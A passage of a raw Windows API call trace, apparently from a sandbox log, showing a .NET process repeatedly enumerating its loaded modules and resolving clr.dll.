hModule=0x76070000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0108.708] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0108.708] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0108.709] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0108.709] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0108.709] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0108.710] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0108.710] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0108.710] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0108.712] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0108.713] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0108.713] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0108.714] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0108.714] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0108.715] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0108.715] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0108.716] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0108.716] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0108.717] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0108.717] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0108.718] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0108.719] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0108.719] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0108.720] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0108.720] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x18dd08, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0109.815] StrStrIW (lpFirst="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll", lpSrch="\\system.ni.dll") returned 0x0 [0109.975] GetCurrentProcess () returned 0xffffffff [0109.975] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18dca8, cb=0x1000, lpcbNeeded=0x18eebc | out: lphModule=0x18dca8, lpcbNeeded=0x18eebc) returned 1 [0109.976] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0109.976] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0109.976] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0109.976] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0109.976] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0109.976] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0109.977] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0109.977] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0109.977] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0109.977] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0109.978] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0109.978] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0109.978] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0109.978] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0109.979] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0109.979] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0109.979] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0109.980] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0109.980] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0109.980] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0109.981] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0109.981] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0109.982] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0109.982] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0109.983] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0109.983] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0109.984] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0109.984] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0109.985] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0109.985] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0109.986] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0109.986] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0109.987] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0109.988] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0109.988] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0109.989] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x18eca8, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0109.992] GetCurrentProcess () returned 0xffffffff [0109.992] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d7b4, cb=0x1000, lpcbNeeded=0x18e9c8 | out: lphModule=0x18d7b4, lpcbNeeded=0x18e9c8) returned 1 [0109.993] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0109.993] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0109.993] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0109.993] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0109.993] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0109.993] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0109.994] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0109.994] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0109.994] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0109.994] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0109.994] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0109.995] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0109.995] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0109.995] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0109.996] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0109.996] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0109.996] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0109.997] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0109.997] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0109.997] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0109.998] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0109.998] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0109.999] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0109.999] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0110.000] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0110.000] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0110.001] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0110.001] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0110.002] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0110.002] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0110.003] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0110.003] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0110.004] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0110.005] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0110.005] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0110.008] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x18e7b4, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0110.360] GetCurrentProcess () returned 0xffffffff [0110.360] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d950, cb=0x1000, lpcbNeeded=0x18eb64 | out: lphModule=0x18d950, lpcbNeeded=0x18eb64) returned 1 [0110.361] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0110.361] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0110.361] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0110.361] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0110.361] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0110.361] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0110.361] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0110.362] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0110.362] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0110.362] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0110.362] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0110.363] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0110.363] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0110.363] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0110.364] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, 